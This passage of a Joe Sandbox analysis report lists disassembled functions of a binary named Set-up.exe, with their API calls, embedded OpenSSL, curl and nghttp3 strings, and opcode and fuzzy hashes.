                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,000002BE,?,?,?,?,?,001B71B7,00000001,?,?), ref: 001BAA2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert$memcpy
                                • String ID: i < blk->n$key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key)$ksl->head$nghttp3_ksl.c
                                • API String ID: 3718630003-2514804127
                                • Opcode ID: 0ca0d3ccc94eac73b7898a4453380d9ca3e3bb6686543d19f5fbab9de70d6aa6
                                • Instruction ID: c32f9ac669152f8b7675e58003676e4802cede3b0d065dd0dbb7d33776b1f219
                                • Opcode Fuzzy Hash: 0ca0d3ccc94eac73b7898a4453380d9ca3e3bb6686543d19f5fbab9de70d6aa6
                                • Instruction Fuzzy Hash: AE41CD71104308EFDB00DF15CC80F9ABBA5FF4834CF4605A8E4888B2A2D732E849CB52
                                APIs
                                • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 0035238F
                                • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 003523C4
                                • GetLastError.KERNEL32 ref: 00352433
                                  • Part of subcall function 00352240: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0034F763,?,?,?,?,?), ref: 00352251
                                  • Part of subcall function 00352240: WideCharToMultiByte.KERNEL32 ref: 00352284
                                  • Part of subcall function 00352240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 003522BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ByteCertCertificateCharContextMultiPropertyWide$ErrorLastwcslen
                                • String ID: %lX$ERR_CAPI_error$Error code= 0x$capi_cert_get_fname$engines/e_capi.c$engines/e_capi_err.c
                                • API String ID: 3049598375-4146664032
                                • Opcode ID: 54e8a70bd6e4f2041a706d5466d8b88f0cf56a9d5ace251da075c95fcd82c619
                                • Instruction ID: 54e5c61380d03a00fd98ebd052c4b5b365d2bf0da1a0300f1e7a055cd79050e8
                                • Opcode Fuzzy Hash: 54e8a70bd6e4f2041a706d5466d8b88f0cf56a9d5ace251da075c95fcd82c619
                                • Instruction Fuzzy Hash: 3C212BA57503007BEA1137A5BC07F3B36189792B46F044534FE08791D3E6D959284EA3
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 002F49A8
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 002F4D44
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?), ref: 002F4E33
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy$strcpystrlen
                                • String ID: No password method specified$Prompt info data type incorrect$crypto/passphrase.c$do_ui_passphrase$info$ossl_pw_get_passphrase$pass phrase
                                • API String ID: 699153967-1272933286
                                • Opcode ID: 91661eb5856a7b91676a764a2cae7a1a28b5df26f8692efd1d516fb484e244bc
                                • Instruction ID: 46ce36f2f84e697f30b4cb9c85d35ae4fd61c1ff4e4769ef62b2744e56b00675
                                • Opcode Fuzzy Hash: 91661eb5856a7b91676a764a2cae7a1a28b5df26f8692efd1d516fb484e244bc
                                • Instruction Fuzzy Hash: 48C1E4B5B643057BD620BE60DC43F3BB6A4AB50B44F14493CFE89562C3E6F5E8348A52
                                APIs
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 0017491A
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 0017497C
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 001749F1
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00174ABB
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00174B21
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00174BCF
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00174C33
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00174CDD
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,?,0000000B), ref: 00174D30
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memchr
                                • String ID: 0123456789
                                • API String ID: 3297308162-2793719750
                                • Opcode ID: 35470b523cb64f882907860cf398b55532cbbaf576214e2b28c9c85c30cdf356
                                • Instruction ID: dc26d6b69e0762d7a73ee2afda2fd07d17b4117db31b4ae37568c270251008c3
                                • Opcode Fuzzy Hash: 35470b523cb64f882907860cf398b55532cbbaf576214e2b28c9c85c30cdf356
                                • Instruction Fuzzy Hash: 32B164212883955BDB268E2488A07767BE58F96788F0DC07DEED98B3C3D7258D09D351
                                APIs
                                  • Part of subcall function 002EB4B0: GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?,?,00000000,00000000,00000000,?,002F7667,OPENSSL_MODULES), ref: 002EB4CA
                                  • Part of subcall function 002EB4B0: GetACP.KERNEL32(?,?,00000000,00000000,00000000,?,002F7667,OPENSSL_MODULES), ref: 002EB4D4
                                  • Part of subcall function 002EB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,002F7667,000000FF,00000000,00000000,?,?,00000000,00000000,00000000,?,002F7667,OPENSSL_MODULES), ref: 002EB53B
                                  • Part of subcall function 002EB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,002F7667,000000FF,-00000008,00000000,?,?,?,00000000,00000000,00000000,?,002F7667,OPENSSL_MODULES), ref: 002EB5A1
                                  • Part of subcall function 002EB4B0: GetEnvironmentVariableW.KERNEL32(-00000008,00000000,00000000,?,?,?,00000000,00000000,00000000,?,002F7667,OPENSSL_MODULES), ref: 002EB5B4
                                  • Part of subcall function 002EB4B0: GetEnvironmentVariableW.KERNEL32(?,-00000008,00000000,?,?,?,?,00000000,00000000,00000000,?,002F7667,OPENSSL_MODULES), ref: 002EB648
                                  • Part of subcall function 002EB4B0: WideCharToMultiByte.KERNEL32 ref: 002EB67F
                                  • Part of subcall function 002EB4B0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(002F7667,?,?,00000000,00000000,00000000,?,002F7667,OPENSSL_MODULES), ref: 002EB504
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0027A1F0
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0027A20B
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000), ref: 0027A25D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ByteCharEnvironmentMultiVariableWide$strlen$getenvmemcpy
                                • String ID: %02x$OSSL_QFILTER$QLOGDIR$_%s.sqlog$client$server$ssl/quic/qlog.c
                                • API String ID: 2744062652-2540125403
                                • Opcode ID: d8495af7c755b035fe9fd926d7bf6e17017068e8d46fc509179809444e3b56c4
                                • Instruction ID: e2b6cc671f4756eed03ac5c2fbd2e5365eef5d0bc385440a876c00d3a0b048fc
                                • Opcode Fuzzy Hash: d8495af7c755b035fe9fd926d7bf6e17017068e8d46fc509179809444e3b56c4
                                • Instruction Fuzzy Hash: 365118E1A183556FEB106E259C42B2F76D89FD0319F088478FC8D86243FB79ED20C652
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0013284C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen
                                • String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.$url.c
                                • API String ID: 39653677-4104037097
                                • Opcode ID: 9b98c3520768c9bb65cd849a8001601c71f9f9b1bc597fc1cfb81db2f2366e11
                                • Instruction ID: 3c560e1a8e9a5d37bc2971a340f9fb3dbdbc77afc25d8f0ad521ff600527c97f
                                • Opcode Fuzzy Hash: 9b98c3520768c9bb65cd849a8001601c71f9f9b1bc597fc1cfb81db2f2366e11
                                • Instruction Fuzzy Hash: 80A14370604340AFDB38AE18D845B7A7BD6AF95318F19847DFC898B2D2E7369C41C392
                                APIs
                                • getpeername.WS2_32(?,?,00000080), ref: 0014A376
                                • WSAGetLastError.WS2_32 ref: 0014A380
                                  • Part of subcall function 001178B0: closesocket.WS2_32(?), ref: 001178BB
                                  • Part of subcall function 0014EF30: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001,?,?), ref: 0014EF6F
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0014A3D2
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0014A3D6
                                Strings
                                • ssrem inet_ntop() failed with errno %d: %s, xrefs: 0014A3F4
                                • accepted_set(sock=%d, remote=%s port=%d), xrefs: 0014A488
                                • getpeername() failed with errno %d: %s, xrefs: 0014A3A0
                                • cf-socket.c, xrefs: 0014A2E9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _errno$ErrorLastclosesocketgetpeername
                                • String ID: accepted_set(sock=%d, remote=%s port=%d)$cf-socket.c$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                • API String ID: 1501154218-2965463112
                                • Opcode ID: eca15a8d94dac7aa3b57ec7db467fad0af96c84cdc73d6829d7f6dccda37d943
                                • Instruction ID: 5c2b7c157b446b2867aff6a641b0755e568460d82327e0cd82686090508fb5e4
                                • Opcode Fuzzy Hash: eca15a8d94dac7aa3b57ec7db467fad0af96c84cdc73d6829d7f6dccda37d943
                                • Instruction Fuzzy Hash: 51512831944340ABE721DF24DC42FE777B4EF91318F044518F99C5B262EB72A999CB92
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 001BA5FC
                                • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 001BA698
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 001BA6BF
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i + 1 < blk->n,nghttp3_ksl.c,0000019B), ref: 001BA6EB
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK,nghttp3_ksl.c,000001A2), ref: 001BA700
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assertmemcpy$memmove
                                • String ID: i + 1 < blk->n$lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK$nghttp3_ksl.c
                                • API String ID: 3463011695-2629231663
                                • Opcode ID: 85755b1384e4cc2871dcd83de97c6ba243ffc4ff50e1c0b17dcec3505cb2db71
                                • Instruction ID: d6eb202282acd2a51724af9ded836a3cd2ddbb612807b8f0fd085f6e0b473b41
                                • Opcode Fuzzy Hash: 85755b1384e4cc2871dcd83de97c6ba243ffc4ff50e1c0b17dcec3505cb2db71
                                • Instruction Fuzzy Hash: 8D4180B5604304AFC708DF18D88186AB7EAFF98714F48C96DE8899B352E770ED11CB95
                                APIs
                                • CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00352491
                                • CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 003524C6
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0034F5B4), ref: 00352529
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: CertCertificateContextProperty$ErrorLast
                                • String ID: %lX$ERR_CAPI_error$Error code= 0x$engines/e_capi.c$engines/e_capi_err.c
                                • API String ID: 2217977984-837018288
                                • Opcode ID: 9f991eddd54fa8b72b6a7059774907411ab816e30870dfb3837f2a99f3b13b30
                                • Instruction ID: 1222d839faab870ba87e52c08273cc100ef131454093b23b5235830839cbfc27
                                • Opcode Fuzzy Hash: 9f991eddd54fa8b72b6a7059774907411ab816e30870dfb3837f2a99f3b13b30
                                • Instruction Fuzzy Hash: 8011B6A5B9030477FA203771BC47F3B3A4CEB52B89F044534FA08651D3E5E599248EA3
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00162666
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00162699
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 001626FB
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 0016273A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$_time64memcpy
                                • String ID: :%u$Shuffling %i addresses$hostip.c
                                • API String ID: 2198566249-1766712111
                                • Opcode ID: f573668d42811ab5080f0f3cf0452d691bf35e304aab9a2bafbcd25d7cf1f23f
                                • Instruction ID: e734d659bdcfba78d6aa7ea787a1b12d0ccc7cb2b4326caa9fcc4ed290cde838
                                • Opcode Fuzzy Hash: f573668d42811ab5080f0f3cf0452d691bf35e304aab9a2bafbcd25d7cf1f23f
                                • Instruction Fuzzy Hash: 54A1DD75A04B009BD734DE18DC45BABB7E5EF98304F19843DED8A87382E735E9618B81
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 004969F1
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000001,00000000,00000000,?,00000009,?), ref: 00496A11
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,000000FF,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00496A53
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00496AB6
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00496AC7
                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00496ADA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _errno$abortmemcpymemset
                                • String ID: UTF-8
                                • API String ID: 3754757788-243350608
                                • Opcode ID: bd568a31293167de5522a4781319728e532a0f13f814b92e2c036f5cfc9e4417
                                • Instruction ID: 901233ec56ad078ba4e3305688f14e271edfe3d134099e6a0d764795feda42aa
                                • Opcode Fuzzy Hash: bd568a31293167de5522a4781319728e532a0f13f814b92e2c036f5cfc9e4417
                                • Instruction Fuzzy Hash: 6041D4B06083016FDF118F69D895B2B7FE5AB86358F06893EF88587381E639DC44C75A
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00112359
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00112465
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001124AB
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001123EE
                                  • Part of subcall function 00111A54: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00111A70
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free$abortmallocstrlen
                                • String ID: $ $ $Memory allocation failed for decrypted data.
                                • API String ID: 673139954-1317699236
                                • Opcode ID: b7a02b9ec97734f3e1d8e712ea6039664ff91077252286315cada36acdeaa42d
                                • Instruction ID: 1950035792a38c97f3a8961f2891151c3a3c6cf20303614f9add7bce73173678
                                • Opcode Fuzzy Hash: b7a02b9ec97734f3e1d8e712ea6039664ff91077252286315cada36acdeaa42d
                                • Instruction Fuzzy Hash: B75183B4A047099FCB04EFA9C48599EBBF1FF88300F10896AE85897325E774D954CF92
                                APIs
                                  • Part of subcall function 0012D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,001201B1), ref: 0012D8E2
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,0015420E,?,?), ref: 00126350
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(0015420E,?,?,?,?,?,?,?,?,?,0015420E,?,?), ref: 0012635B
                                • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00126369
                                • Sleep.KERNEL32(00000001), ref: 001263B2
                                • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 001263BC
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0015420E,?,?), ref: 001263C7
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0015420E,?,?), ref: 001263D6
                                  • Part of subcall function 0012D8C0: GetTickCount.KERNEL32 ref: 0012D968
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 001263ED
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
                                • String ID:
                                • API String ID: 1793959362-0
                                • Opcode ID: b8713239c43ac293a4f3e33951fa2f81a0d080def233029b4e5651a684874523
                                • Instruction ID: e9e97ab1986daf07533d3a34bc0bb0d07829125effdfa2ca9f3e292067661404
                                • Opcode Fuzzy Hash: b8713239c43ac293a4f3e33951fa2f81a0d080def233029b4e5651a684874523
                                • Instruction Fuzzy Hash: 87110BB7C0026057EB11A625BC42B7F7758BFA6728F080239FC4C92282FB25D96483D3
                                APIs
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0011623A
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0011624D
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0011627C
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00116389
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$_time64memcpy
                                • String ID: .$hsts.c
                                • API String ID: 2198566249-2242870694
                                • Opcode ID: 9c45198af3062062bf283b4c20001b42301ec69854220dc83fba07242d95fdd4
                                • Instruction ID: d04caafef0ab3ee249a50e600d7130a7053e425e6b3f377a1f2f3d262cb1edbb
                                • Opcode Fuzzy Hash: 9c45198af3062062bf283b4c20001b42301ec69854220dc83fba07242d95fdd4
                                • Instruction Fuzzy Hash: 88412BA5D043445BEB18BE60AC067DF7698AF35314F080438FD5D53283F776A9A8C692
                                APIs
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0000002E), ref: 0049447B
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000042), ref: 004944C4
                                • WSAStringToAddressW.WS2_32(?,00000002,00000000,?,00000010), ref: 004944E3
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(0000002E), ref: 00494500
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0049450B
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0000002E), ref: 0049451F
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00494546
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$strcmp$AddressByteCharMultiStringWide
                                • String ID:
                                • API String ID: 389649969-0
                                • Opcode ID: 85bc7304d765ed94c055df54c02c7ded5e51ccb8108e7be350e5abf45abfe39a
                                • Instruction ID: 8a9e0e74e6a1a10254886c17e51a6585364371b2e5128460d1adb77e8a350377
                                • Opcode Fuzzy Hash: 85bc7304d765ed94c055df54c02c7ded5e51ccb8108e7be350e5abf45abfe39a
                                • Instruction Fuzzy Hash: 5E315BB190430577FF209A65DC01FBB7A8C9BD1368F09423EFA48962C1FA7DBD458266
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0032E16C
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0032E17B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen
                                • String ID: $ for$:$Ente$crypto/ui/ui_lib.c
                                • API String ID: 39653677-4294831502
                                • Opcode ID: 2839cb7ee02cff65a5ec2896f5473b64b60b256fcde777067c5d9a0950ac5b47
                                • Instruction ID: abb68e272e5627a5fafcde9cd785ffd76351375f6e3cdb2fcc78bb2e4c0b0e88
                                • Opcode Fuzzy Hash: 2839cb7ee02cff65a5ec2896f5473b64b60b256fcde777067c5d9a0950ac5b47
                                • Instruction Fuzzy Hash: CA21CBF69043207BE6119956BC42D6B7BEC9D91394F0A4439FD0C86242F635D924C6E3
                                APIs
                                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0034F763,?,?,?,?,?), ref: 00352251
                                • WideCharToMultiByte.KERNEL32 ref: 00352284
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 003522BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$wcslen
                                • String ID: ERR_CAPI_error$engines/e_capi.c$engines/e_capi_err.c
                                • API String ID: 1062461220-336193293
                                • Opcode ID: c9fe8a266b892469cc4f1ba5f4af2f4db33cf457a255f97928e89f4b94451576
                                • Instruction ID: 07655064a915820c8bc1b3278f1bf83103e209440e1dee7fdf61360d0c58614b
                                • Opcode Fuzzy Hash: c9fe8a266b892469cc4f1ba5f4af2f4db33cf457a255f97928e89f4b94451576
                                • Instruction Fuzzy Hash: 52213BB5F043047BEB202761AC06F2B3648AB91715F148639FD0C661D2EAF85C548F92
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000005,?,?,?,?,0046DA6D,00000000,0083D9B4,?,?,?,?,?), ref: 0048299B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00482A76
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00020000), ref: 00482A82
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00482AAE
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00482ABA
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00482B3F
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00482C32
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000005,?,?,?,?,?,?,0046DA6D,00000000,0083D9B4,?,?,?,?,?), ref: 00482CB2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy$freemalloc
                                • String ID:
                                • API String ID: 3313557100-0
                                • Opcode ID: 5046d603a94fd3252230c88e938c23c6d318e10f91fc871fa2bda040c97fa93c
                                • Instruction ID: a995e99d48559c7a30a2231ad8a0654a897aa5fd6e8b1055cfeef67f1dcc7bb6
                                • Opcode Fuzzy Hash: 5046d603a94fd3252230c88e938c23c6d318e10f91fc871fa2bda040c97fa93c
                                • Instruction Fuzzy Hash: 1FD193B16042149BCB14EF2CC984AAE7BE1BF88314F154A2EFC5987391D7B4EC41CB99
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,0026A9CE,000000D2), ref: 002C83A3
                                • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0026A9CE), ref: 002C83C6
                                  • Part of subcall function 002C60E0: GetLastError.KERNEL32(002C7CCC,?,00000000,002C7127,002C7CCC,00000000,002ECAB7,00111A70), ref: 002C60E3
                                  • Part of subcall function 002C60E0: SetLastError.KERNEL32(00000000), ref: 002C61A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ErrorLast$strcpystrlen
                                • String ID: crypto/err/err_local.h
                                • API String ID: 542397150-344804083
                                • Opcode ID: 231bcf060da88086aa08c061d8bacaad75574139127562d23c1899331f8f21e6
                                • Instruction ID: 30af4ad794e548e83ed22b2c55f4620b6c5b4d9e93373388c068036d8599ba34
                                • Opcode Fuzzy Hash: 231bcf060da88086aa08c061d8bacaad75574139127562d23c1899331f8f21e6
                                • Instruction Fuzzy Hash: E88187B1510B469FE7238F19E885BE2B7D0FF4030CF448A1DE995872A5EB79A434CB51
                                APIs
                                  • Part of subcall function 001173F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0011CA95,006E9AB8,00000467,mprintf.c), ref: 0011741D
